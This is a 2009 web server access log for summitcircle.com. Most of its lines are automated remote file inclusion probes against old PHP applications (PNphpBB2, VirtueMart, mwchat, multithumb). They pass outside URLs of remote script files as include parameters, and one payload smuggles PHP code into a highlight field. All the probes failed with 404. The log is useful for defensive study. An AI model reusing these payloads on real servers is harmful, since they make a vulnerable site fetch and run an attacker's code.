124.0.103.194 - - [28/Jun/2009:22:45:22 -0700] "GET /logs/access_090222.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:22:47:39 -0700] "GET /logs/access_090222.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:22:47:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:22:47:39 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:47:42 -0700] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:47:42 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:47:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:47:44 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:47:44 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:47:44 -0700] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:49:04 -0700] "GET /logs/access_090104.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:49:17 -0700] "GET /logs/access_090104.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:49:43 -0700] "GET /logs/access_090413.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:22:50:11 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:22:50:11 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:22:50:11 -0700] "GET /logs/access_090222.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:18 -0700] "GET /logs/access_090104.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:18 -0700] "GET /logs/access_090104.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:18 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:19 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:54 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:54 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:54 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:54 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:50:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
209.172.33.230 - - [28/Jun/2009:22:51:00 -0700] "GET /logs/access.log//index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:51:08 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:51:09 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:22:51:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:22:58:01 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:22:58:05 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:22:58:06 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:22:58:06 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:22:58:06 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:22:58:06 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:22:59:20 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:22:59:20 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:22:59:20 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:22:59:27 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:22:59:27 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:22:59:27 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
58.61.164.141 - - [28/Jun/2009:22:59:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.summitcircle.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:02:35 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:02:52 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:03:13 -0700] "GET /administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:03:14 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:03:14 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:03:14 -0700] "GET /administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:03:18 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:03:18 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:05:34 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:05:34 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:05:34 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:05:37 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:05:37 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:05:37 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:10:28 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:10:28 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:10:28 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:10:28 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:10:28 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:10:28 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:11:55 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:11:55 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:11:55 -0700] "GET /logs/access_090413.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:13:41 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:13:41 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:13:41 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.15.230.250 - - [28/Jun/2009:23:15:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.15.230.250 - - [28/Jun/2009:23:15:22 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.15.230.250 - - [28/Jun/2009:23:15:22 -0700] "GET /logs/access_090222.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:23:15:50 -0700] "GET /logs/access_090222.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:23:15:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:23:15:50 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:16:01 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:16:01 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:16:01 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:16:09 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:16:09 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [28/Jun/2009:23:16:09 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:23:16:36 -0700] "GET /logs/access_090202.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:23:16:40 -0700] "GET /logs/access_090119.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:23:16:40 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:23:16:40 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:16:44 -0700] "GET /logs/access_090413.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:23:19:00 -0700] "GET /logs/access_081201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:23:19:10 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "summitcircle.com"
